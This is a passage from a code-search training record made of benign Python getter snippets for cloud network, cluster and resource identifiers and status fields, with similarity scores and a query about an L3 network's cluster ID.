"def network_instances(self) -> Iterator[NetworkInstance]:\n return self._get_related_instance(NetworkInstance, \"l3-network\")",
"def references(self):\n return self._get_related_resources(False)",
"def all_base_cloud_ids(self):\n raise NotImplementedError",
"def get_refresh_ids(self):\n ids = []\n for bucket in self.router.lonely_buckets():\n rid = random.randint(*bucket.range).to_bytes(20, byteorder='big')\n ids.append(rid)\n return ids",
"def resource_id_patterns(self) -> Sequence[str]:\n return pulumi.get(self, \"resource_id_patterns\")",
"def resource_group_ids_scope(self) -> str:\n return pulumi.get(self, \"resource_group_ids_scope\")",
"def resource_group_ids_scope(self) -> str:\n return pulumi.get(self, \"resource_group_ids_scope\")",
"def resources(self):\n return self.__resources",
"def getRefreshIDs(self):\n ids = []\n for bucket in self.router.getLonelyBuckets():\n rid = random.randint(*bucket.range).to_bytes(20, byteorder='big')\n ids.append(rid)\n return ids",
"def multi_zone_ids(self) -> Sequence[str]:\n return pulumi.get(self, \"multi_zone_ids\")",
"def disk_ids(self):\n return list(self._disks)",
"def subnet_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"subnet_ids\")",
"def subnet_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"subnet_ids\")",
"def subnet_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"subnet_ids\")",
"def resources(self):\n return list(self.get_resources_for_type(gdef.ResType_All))",
"def node_ids(self):\n return [self.node_id]",
"def create_resources(self) -> List[ResourceDescription]:\r\n return self.resources",
"def networks(self) -> dict:\n return self.data[\"networks\"]",
"def netlist(self):\n return self._netlist",
"def resource_names(self) -> pulumi.Output[Optional[Mapping[str, Sequence[str]]]]:\n return pulumi.get(self, \"resource_names\")",
"def getIDs(self):\n return self.multiengine.getIDs()",
"def names(self):\r\n return resource.Name(self)",
"def subresources(self):\n return self._get_related_resources(True)",
"def get_node_ids(self):\n \n return self.node_ids",
"def resource_types(self) -> Sequence[str]:\n return pulumi.get(self, \"resource_types\")",
"def getNets(self):\n\t\treturn NetLoader.listNetworks()",
"def resources(self):\n\n return self.FIXTURE.resources_collection(self)",
"def cluster_ids(self):\n return self.model.cluster_ids",
"def list_networks(self):\n return self._get_names('SCLogicalNetwork')",
"def getAssociatedImagesList(self):\n return sorted(self._associatedImages.keys())",
"def resource_types(self) -> ConfigNodePropertyArray:\n return self._resource_types",
"def list_connections(self):\n return self.network.list_connections()",
"def resources(self):\r\n return self.page.object_list",
"def get_resources(self):\n client = self.client\n if self.resources:\n return self.resources\n\n response = client.list_buckets()\n for resource in response['Buckets']:\n resource_name = resource['Name']\n tags = client.get_bucket_tagging(\n Bucket=resource_name\n )\n self.resources.append({\n \"Name\": resource_name,\n \"Tags\": tags.get(\"TagSet\")\n })\n\n return self.resources",
"def fhir_resource_concepts(self) -> Set[URIRef]:\n return {subj for subj in self.graph.transitive_subjects(RDFS.subClassOf, FHIR.Resource)\n if isinstance(subj, URIRef) and not self.w5_ontology.is_w5_infrastructure(subj)}",
"def get_ids(self):\n return self._graphs.keys()",
"def join_ids(self) -> List[int]:\n return self._join_ids",
"def networks(self) -> Sequence['outputs.NetworkConfigResponse']:\n return pulumi.get(self, \"networks\")",
"def ids(self):\n return list(self._id_generator())",
"def ids(self):\n return list(self._id_generator())",
"def get_resources(self, **extra_args):\n return [lrms for lrms in self.resources.itervalues()]",
"def virtual_networks(self) -> pulumi.Output[Optional[Sequence['outputs.ResourceIdResponse']]]:\n return pulumi.get(self, \"virtual_networks\")",
"def get_resources(self):\n res = set()\n res.update(self.get_inputs())\n res.update(self.get_outputs())\n return res",
"def getAttachIds(self):\n return self._attachments.keys()",
"def otherResources(self, otherResources):\n return self._set_list_field(\"otherResources\", otherResources)",
"def resource_navigation_links(self) -> Sequence['outputs.ResourceNavigationLinkResponse']:\n return pulumi.get(self, \"resource_navigation_links\")",
"def get_sub_resources(self) -> List[Resource]:\n result: List[Resource] = []\n all_names: Set[str] = {i.name for i in self.sub_resources}\n added_names: Set[str] = set()\n sub_resources = list(self.sub_resources)\n sub_resources_list: List[Tuple[Resource, List[InternalImport]]] = []\n for sub_resource in sub_resources:\n internal_imports = sub_resource.get_internal_imports()\n sub_resources_list.append((sub_resource, internal_imports))\n\n sub_resources_list.sort(key=lambda x: len(x[1]))\n for sub_resource, internal_imports in sub_resources_list:\n for internal_import in internal_imports:\n if internal_import.name not in all_names:\n continue\n if internal_import.name in added_names:\n continue\n\n internal_import.stringify = True\n\n result.append(sub_resource)\n added_names.add(sub_resource.name)\n\n return result",
"def listReferenceImages(self):\n productPath = self.productSearch.productClient.product_path(\n project=self.productSearch.projectId, location=self.productSearch.location, product=self.productId)\n\n images = self.productSearch.productClient.list_reference_images(parent=productPath)\n return [x.name for x in images]",
"def security_list_ids(self):\n return self._security_list_ids",
"def layers(self):\n resources = []\n\n paginator = self.client.get_paginator('list_layers')\n page_iterator = paginator.paginate()\n for page in page_iterator:\n layers = page[\"Layers\"]\n for layer in layers:\n name = layer.get(\"LayerName\")\n arn = layer.get(\"LayerArn\")\n resources.append(name)\n return resources",
"def ids(self):\n\n return self._d.keys()",
"def network_list(self, kwargs=None):\n try:\n scode, networks = Rest.get('Network')\n except docker.errors.APIError as e:\n Console.error(e.explanation)\n return\n\n if len(networks) == 0:\n Console.info(\"No network exist\")\n return\n\n n = 1\n e = {}\n data = []\n for network in networks:\n d = {}\n d['Ip'] = network['Ip']\n d['Id'] = network['Id']\n d['Name'] = network['Name']\n d['Containers'] = network['Containers']\n e[n] = d\n n = n + 1\n Console.ok(str(Printer.dict_table(e, order=['Ip', 'Id', 'Name', 'Containers'])))",
"def get_child_resource_nodes(self):\n raise errors.Unimplemented()",
"def resources(self):\n return [self]",
"def edges(self):\r\n return self.capacity.keys()",
"def get_all_resources(self) -> typing.List:\n\n session = self.session()\n\n try:\n available_peers = session\\\n .query(\n ResourceTable.peerIp,\n ResourceTable.peerPort,\n ResourceTable.resourcePath,\n ResourceTable.resourceName,\n ResourceTable.resourceHash\n )\\\n .group_by(ResourceTable.peerId, ResourceTable.resourceHash)\\\n .all()\n\n return available_peers\n\n finally:\n session.close()",
"def getAssociatedImagesList(self):\n imageList = set(self._associatedImages)\n for td in self._tiffDirectories:\n if td is not None:\n imageList |= set(td._embeddedImages)\n return sorted(imageList)",
"def non_resource_ur_ls(self):\n return self._non_resource_ur_ls",
"def network_configurations(self) -> Sequence['outputs.ApplianceNetworkConfigurationResponse']:\n return pulumi.get(self, \"network_configurations\")",
"def network_configurations(self) -> Sequence['outputs.ApplianceNetworkConfigurationResponse']:\n return pulumi.get(self, \"network_configurations\")"
] | [
"0.69101155",
"0.6573186",
"0.6401023",
"0.6343839",
"0.6258195",
"0.5978847",
"0.5978847",
"0.5978847",
"0.5819962",
"0.5801385",
"0.5795712",
"0.5795712",
"0.57860464",
"0.57594633",
"0.5741592",
"0.5688209",
"0.5666085",
"0.5643691",
"0.56345814",
"0.5630704",
"0.5611117",
"0.5605345",
"0.55991346",
"0.55991346",
"0.55941325",
"0.55941325",
"0.55689716",
"0.5566267",
"0.5565457",
"0.55476016",
"0.5528881",
"0.5528881",
"0.5528881",
"0.5528881",
"0.5525145",
"0.55244195",
"0.55172276",
"0.5514684",
"0.551415",
"0.5501953",
"0.54333764",
"0.5432878",
"0.5431186",
"0.5425353",
"0.53965825",
"0.53965825",
"0.5395765",
"0.53955436",
"0.53865266",
"0.53710026",
"0.53562415",
"0.53562415",
"0.53562415",
"0.5354804",
"0.53522205",
"0.5351963",
"0.5350555",
"0.5344895",
"0.5331135",
"0.5330883",
"0.53184456",
"0.531353",
"0.5301585",
"0.5299973",
"0.5299485",
"0.5295163",
"0.5287652",
"0.52772945",
"0.5276725",
"0.52682817",
"0.52592003",
"0.52515316",
"0.5232792",
"0.52318674",
"0.52067125",
"0.51997143",
"0.518026",
"0.51798964",
"0.51798964",
"0.51772213",
"0.51766473",
"0.5169453",
"0.5168469",
"0.5165043",
"0.5162558",
"0.5147888",
"0.5139649",
"0.5138532",
"0.5123874",
"0.511628",
"0.5115927",
"0.511191",
"0.51116484",
"0.5109726",
"0.5107868",
"0.51072663",
"0.51019126",
"0.5095978",
"0.5095978"
] | 0.70806557 | 1 |
The resource ID of the Network Cloud cluster this L3 network is associated with. | def cluster_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "cluster_id") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self):\n return self._cluster_id",
"def cluster_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_identifier(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_identifier\")",
"def external_network_id(self) -> str:\n return pulumi.get(self, \"external_network_id\")",
"def parent_cluster_resource_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"parent_cluster_resource_id\")",
"def id(self): \n if self.cloudnet:\n return self.cloudnet.id\n else:\n return None",
"def orig_cluster_id(self):\n if self.old_cluster_name is None:\n raise RuntimeError('old_cluster_name is not set')\n return self.fuel_web.client.get_cluster_id(self.old_cluster_name)",
"def get_cluster_id(self):\n cmd = \"svcinfo lscluster -delim :\"\n\n output = self._svc_command(cmd)[0]\n\n if len(output) != 2:\n return None\n\n header = output[0].split(':')\n values = output[1].split(':')\n index = header.index(SVC_CLUSTER_ID)\n cluster_id = values[index]\n return cluster_id",
"def parent_cluster_resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"parent_cluster_resource_id\")",
"def cloud_services_network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cloud_services_network_id\")",
"def resource_type(self):\n return 'cluster'",
"def get_network_id(self):\n\t\treturn call_sdk_function('PrlVirtNet_GetNetworkId', self.handle)",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def cni_network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cni_network_id\")",
"def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")",
"def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")",
"def network_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"network_id\")",
"def cluster_subnet(self) -> str:\n return pulumi.get(self, \"cluster_subnet\")",
"def get_cluster_id(options):\n cluster = options.cluster\n datacenter = get_datacenter(options)\n for item in datacenter.hostFolder.childEntity:\n if (item.name == cluster):\n return item._GetMoId()",
"def _get_network_id(self):\n pubnet = self.conn.network.find_network('public')\n net = self.conn.network.find_network(self.net_conf['net_name'])\n subnet = self.conn.network.find_subnet(self.net_conf['subnet_name'])\n # TODO: Add support for security group\n\n self.network_id = {\n 'public': pubnet.id,\n 'net': net.id,\n 'subnet': subnet.id\n }",
"def network_fabric_controller_id(self) -> str:\n return pulumi.get(self, \"network_fabric_controller_id\")",
"def cluster_name(self):\n return self.name",
"def cluster_name(self):\n return self._data['cluster_name']",
"def data_center_id(self) -> str:\n return pulumi.get(self, \"data_center_id\")",
"def data_center_id(self) -> str:\n return pulumi.get(self, \"data_center_id\")",
"def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")",
"def _newClusterId(self):\n return self.guidGenerator.new_id()",
"def get_cluster_name(cls):\n\n mid = Machineid()\n if mid.is_sps_cluster:\n return cls.SPS\n if mid.is_spts_cluster:\n return cls.SPTS\n if mid.is_mdfl_cluster:\n return cls.MDFL\n\n return cls.LOCAL",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_pool_id(self) -> str:\n return pulumi.get(self, \"resource_pool_id\")",
"def cluster_type(self) -> str:\n return pulumi.get(self, \"cluster_type\")",
"def network(self) -> str:\n return pulumi.get(self, \"network\")",
"def namespace_id(self) -> str:\n return pulumi.get(self, \"namespace_id\")",
"def virtual_network_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"virtual_network_id\")",
"def cluster_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cluster_name\")",
"def cluster_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cluster_name\")",
"def cluster(self):\n return self._cluster",
"def cluster(self):\n return self._cluster",
"def id(self):\n if self.cloudserver:\n return self.cloudserver.id\n else:\n return None",
"def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def cluster_name(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"cluster_name\")",
"def core_network_arn(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"core_network_arn\")",
"def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")",
"def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")",
"def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")",
"def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")",
"def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")",
"def central_node_id(self):\n if self._central_node_id is None:\n return self.nodes[0]\n else:\n return self._central_node_id",
"def get_id(self):\n if not self.nccl_id:\n logger.warning(\"The NCCL ID has not been \"\n \"set yet for store {}.\".format(self.name))\n return self.nccl_id",
"def datacenter_uuid(self) -> str:\n return self.__datacenter_uuid",
"def datacenter_uuid(self) -> str:\n return self.__datacenter_uuid",
"def datacenter_uuid(self) -> str:\n return self.__datacenter_uuid",
"def get_cluster_id(self, item: str) -> str:\n assert item in self._clusters.keys()\n return self._clusters[item]",
"def core_network_arn(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"core_network_arn\")",
"def get_network_id(options, network):\n service_instance = get_vc_content(options)\n datacenter = get_datacenter(options)\n for item in datacenter.networkFolder.childEntity:\n if (item.name == network):\n return item._GetMoId()",
"def l3_network_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"l3_network_name\")",
"def resource_group_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def establish_id(self):\n if self.config.node_id is None:\n self.config.node_id = str(uuid4()).replace('-', '')\n return self.config.node_id",
"def network_id(tenant_id, auth_token, network_name):\r\n content = common_utils.do_request(\r\n tenant_id, auth_token,\r\n method='GET',\r\n body='', service=\"network\",\r\n path='networks.json')\r\n for network in range(len(content[\"networks\"])):\r\n if content[\"networks\"][network][\"name\"] == network_name:\r\n network_id = content[\"networks\"][network][\"id\"]\r\n return network_id",
"def __repr__(self):\n\n return \"<Cluster id=%s>\" % (self.id)",
"def get_cluster_idx(_cluster):\n\n return _cluster.cluster_idx",
"def virtual_network_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"virtual_network_id\")",
"def cluster_constraint(self):\n return self._cluster_constraint",
"def get_cluster(self,cluster_name,project_id=''):\n print( f'>>>>>>{self.project_id}')\n if project_id == '':\n project_id = self.project_id\n return self.get('{}/groups/{}/clusters/{}'.format(ApiVersion.A1.value,project_id,cluster_name))",
"def subnet_id(self) -> str:\n return pulumi.get(self, \"subnet_id\")",
"def getMcc3Id(self):\n return self._base.getMcc3Id()",
"def node_id(self) -> int:\n return self.data[\"nodeId\"]",
"def node_id(self) -> int:\n return self.data[\"nodeId\"]",
"def resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"resource_id\")",
"def getMcc3Id(self):\n return self.mcc3id",
"def getMcc3Id(self):\n return self.mcc3id",
"def getMcc3Id(self):\n return self.mcc3id",
"def getMcc3Id(self):\n return self.mcc3id",
"def id(self) -> str:\n\n return self._inst.query('*IDN?')",
"def reactornet_id(self):\n return self.__reactornet_id",
"def __str__(self):\n return \"Cluster\"",
"def remote_virtual_network_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"remote_virtual_network_id\")",
"def resource_group_id(self) -> Optional[str]:\n return pulumi.get(self, \"resource_group_id\")"
] | [
"0.8012701",
"0.8012701",
"0.8012701",
"0.8012701",
"0.8012701",
"0.767193",
"0.724202",
"0.724202",
"0.71904457",
"0.71904457",
"0.71904457",
"0.7147318",
"0.71079326",
"0.7104546",
"0.70985615",
"0.70811",
"0.7055768",
"0.69946766",
"0.69447",
"0.69314307",
"0.68725604",
"0.6832653",
"0.6832653",
"0.6832653",
"0.67877",
"0.675452",
"0.675452",
"0.67255384",
"0.6703281",
"0.66540194",
"0.66500056",
"0.6586709",
"0.6579923",
"0.65753603",
"0.6549429",
"0.6549429",
"0.6436575",
"0.6436575",
"0.6436575",
"0.64012647",
"0.63643515",
"0.63575846",
"0.63575846",
"0.63575846",
"0.63575846",
"0.63575846",
"0.6321969",
"0.62877643",
"0.62430173",
"0.624208",
"0.62416667",
"0.6241128",
"0.6241128",
"0.6211911",
"0.6211911",
"0.6196339",
"0.6190815",
"0.6190815",
"0.6190815",
"0.6173408",
"0.61450046",
"0.61427855",
"0.61427855",
"0.61427855",
"0.61427855",
"0.61427855",
"0.61383533",
"0.6137229",
"0.6092062",
"0.6092062",
"0.6092062",
"0.60756564",
"0.60585934",
"0.60494816",
"0.60337055",
"0.598342",
"0.59791404",
"0.59762883",
"0.5958334",
"0.59526455",
"0.59298325",
"0.5926837",
"0.59239966",
"0.59227157",
"0.5920609",
"0.5917674",
"0.5917674",
"0.5917547",
"0.59090245",
"0.59090245",
"0.59090245",
"0.59090245",
"0.5904049",
"0.58937186",
"0.5869006",
"0.5868684",
"0.5867358"
] | 0.74517417 | 8 |
The more detailed status of the L3 network. | def detailed_status(self) -> pulumi.Output[str]:
return pulumi.get(self, "detailed_status") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def status(ctx):\n return show_network_status()",
"def detailed_status(self) -> str:\n return pulumi.get(self, \"detailed_status\")",
"def status(self):\n \n tmpl1 = \"\"\"%-20s%-52s[%s]\"\"\"\n tmpl2 = \"\"\"%-20s%-52s\\n\"\"\"\n # print tmpl1 % (\"Machine Name\", \"IP Addresses\", \"Status\")\n # print 80 * \"-\"\n # print self.get_image()\n if self.cloudserver:\n # let's build the IPs first\n status = self.cloudserver.status\n \n else:\n status = \"OFF\"\n\n res2=\"\"\n ip1 = \"%s:%s\" % (self.networks[0], self.ip_addresses[self.networks[0]])\n if len(self.networks) > 1:\n res2 += \"\\n\"\n for network in self.networks[1:]:\n ipstr = \"%s:%s\" % (network, self.ip_addresses[network])\n res2+=tmpl2 % (\"-\", ipstr)\n # print res2\n # if len(self.ip_addresses.keys()) > 1:\n # ip1 = self.ip_addresses.values()[0]\n res1 = tmpl1 % (self.machine_name, ip1, status)\n return res1 + res2",
"def status(self):\n res = \"\"\n for tlight in self.trafficLights:\n res += \"Traffic light {} status: {}\\n\".format(self.trafficLights[tlight].id,self.trafficLights[tlight].getState())\n return res",
"def status(self):\n return {\n 'id': 'status',\n 'protocol_version': 'PV62',\n 'network': self.origin_node.network.name,\n 'td': self.origin_node.chain.head.header.difficulty,\n 'best_hash': self.origin_node.chain.head.header.hash,\n 'genesis_hash': self.origin_node.chain.genesis.header.hash,\n 'size': kB_to_MB(self._message_size['status'])\n }",
"def get_status(self):\n if self.status:\n print(f\"Server '{self.server_name}' is online\")\n else:\n print(f\"Server '{self.server_name}' is offline\")",
"def printstatus(self):\n data = self.statuslist()\n if not data:\n print(\n \"Unable to communicate to the OpenSprinkler \"\n \"at %s\" % self.hostname\n )\n return None\n print('Station\\t%-15.15s\\tStatus' % 'Name')\n for item in data:\n print('%d\\t%-15.15s\\t%s' % (item[0], item[1], item[2]))\n return",
"def status(self):\n r = requests.get('/'.join([self.base_url, self.ENDPOINT_STATUS]))\n return r.json()",
"def status(self, *args):\n st = dict()\n st[\"num_sockets\"] = 0 # TODO: when sockets implemented\n st[\"mem_free\"] = gc.mem_free()\n st[\"wlan_connected\"] = network.WLAN(network.STA_IF).isconnected()\n return True, json.dumps(st).encode()",
"def get_status(self):\n r = requests.get(self.base_url + '/status')\n return r.json()",
"def detail(self):\n return self.status[\"health\"][\"detail\"]",
"def getStatus():",
"def remote_status():",
"def status(self):\n return self._get(path='status')",
"def status_str(self, spaced=False):\n if self.args.vverbose:\n ## Print profile of all nodes\n status = self.pool.status(string=True)\n\n elif self.args.verbose:\n ## Print profile of usable nodes\n status = self.pool.status(min_state=PLNodeState.usable, string=True)\n\n else:\n ## Print list of usable nodes\n attribute = \"name\" if self.args.names else \"addr\"\n nodes = self.pool._get(attribute, min_state=PLNodeState.usable)\n if len(nodes) > 0:\n status = \"\\n\".join(nodes)+\"\\n\"\n else:\n status = \"No usable node found.\\n\"\n\n return status",
"def status(self):",
"def detailed_status_message(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"detailed_status_message\")",
"def detailed_status_message(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"detailed_status_message\")",
"def print_status(self):\n wlan = ''\n ip = ''\n mac = ''\n homepage = ''\n pairing_code = ''\n\n ssid = helpers.get_ssid()\n wlan = '\\nWireless network:\\n%s\\n\\n' % ssid\n\n interfaces = ni.interfaces()\n ips = []\n for iface_id in interfaces:\n iface_obj = ni.ifaddresses(iface_id)\n ifconfigs = iface_obj.get(ni.AF_INET, [])\n for conf in ifconfigs:\n if conf.get('addr') and conf.get('addr'):\n ips.append(conf.get('addr'))\n if len(ips) == 0:\n ip = '\\nERROR: Could not connect to LAN\\n\\nPlease check that the IoTBox is correc-\\ntly connected with a network cable,\\n that the LAN is setup with DHCP, and\\nthat network addresses are available'\n elif len(ips) == 1:\n ip = '\\nIP Address:\\n%s\\n' % ips[0]\n else:\n ip = '\\nIP Addresses:\\n%s\\n' % '\\n'.join(ips)\n\n if len(ips) >= 1:\n ips_filtered = [i for i in ips if i != '127.0.0.1']\n main_ips = ips_filtered and ips_filtered[0] or '127.0.0.1'\n mac = '\\nMAC Address:\\n%s\\n' % helpers.get_mac_address()\n homepage = '\\nHomepage:\\nhttp://%s:8069\\n\\n' % main_ips\n\n code = connection_manager.pairing_code\n if code:\n pairing_code = '\\nPairing Code:\\n%s\\n' % code\n\n commands = RECEIPT_PRINTER_COMMANDS[self.receipt_protocol]\n title = commands['title'] % b'IoTBox Status'\n self.print_raw(commands['center'] + title + b'\\n' + wlan.encode() + mac.encode() + ip.encode() + homepage.encode() + pairing_code.encode() + commands['cut'])",
"def status_detail(self):\n return self._status_detail",
"def status(self):\n pass",
"def status(self):\n pass",
"def detailed_status_message(self) -> str:\n return pulumi.get(self, \"detailed_status_message\")",
"def status(self, station=1):\n return self.statuslist()[station][2]",
"def getClusterStatus(self):\n data = self.connect('get','cluster/status', None)\n return data",
"def getInfoOnStatus(self):\n raise NotImplementedError();",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def showStat(self):\n print \">>[Stat Information]:\"\n if self.gid != DEFALUT_GROUP_ID:\n print \"Gid = %u\" % self.gid\n print \"[Queries] Arp = %u, Original_to_controller= %u, Current_to_controller = %u\" % (self.query_arp, self.query_control_origin, self.query_control_current)\n print \"TP = %u, TN = %u, FP = %u\" % (self.tp, self.tn, self.fp)\n print \"[Flow] local_switch = %u, within the group = %u,across groups = %u\" % (self.flow_local, self.flow_within_group, self.flow_cross_group)\n print \"[Traffic] local_switch = %u byte, within the group = %u byte,across groups = %u byte\" % (self.byte_local, self.byte_within_group, self.byte_cross_group)",
"def status(self):\n return self.microblaze.state",
"def status(self):\n return self._data['status']",
"def status(self):\n return self._query_status()['status']",
"def display_status(self) -> str:\n return pulumi.get(self, \"display_status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self):\n logging.debug(\"%s entered status\" % self)\n # print_config(self.infra)\n # print self.images\n # headers = [\"Machine Name\", \"Flavor\", \"IP Addresses\", \"Image Name\", \"Status\"]\n # pt = prettytable.PrettyTable(headers)\n # pt.align[\"Machine Name\"]=\"l\"\n # pt.align[\"IP Addresses\"] = \"l\"\n # pt.align[\"Image Name\"] = \"l\"\n # pt.align[\"Status\"] = \"r\"\n \n print \"Checking status of %s\" % self.footprint_name\n # tmpl = \"%(machine_name)-20s%(flavor)5s%(status)-30s\"\n tmpl1 = \"\"\"%-20s%-52s[%s]\"\"\"\n tmpl2 = \"\"\"%-20s%-60s\\n\"\"\"\n print tmpl1 % (\"Machine Name\", \"IP Addresses\", \"Status\")\n print 80 * \"-\"\n \n for machine in self.machines.keys():\n m = self.machines[machine]\n # machine_name = m.machine_name\n # ips = str(m.ip_addresses)\n # flavor = str(m.flavor)\n # img = str(m.image_id)\n # status = str(m.status)\n # pt.add_row([m, ips, status, img, status])\n # print \"FFF\", m, ips, flavor, img, status\n # print tmpl % locals()\n print m.status\n \n return \"%s is currently: %s\" % (self.footprint_name, self.footprint_status)",
"def print_summary(self):\n self.network.print_summary()",
"def show_status():\n\n pass",
"def print_network(self):\n #plot_model(self.model, to_file='model.png', show_shapes=True)\n logging.info(\"\")\n logging.info(self.network)\n logging.info(\"Network accuracy: %.2f%%\" % (self.accuracy * 100))\n logging.info(\"Network loss: %.2f%%\" % (self.loss))",
"def status(self):\n\t\treturn self._status",
"def _print_status(self):",
"def status(self):\n return self.status",
"def status_info(self):\n def subdevice_filter(info):\n return bool(info['kind'] & Kind.normal)\n\n return ophydobj_info(self, subdevice_filter=subdevice_filter)",
"def status(self):\n self._refresh_state()\n return self._data.get('status')",
"def Status(self):\r\n\t\treturn self._get_attribute('status')",
"def sipserver_status(self) -> str:",
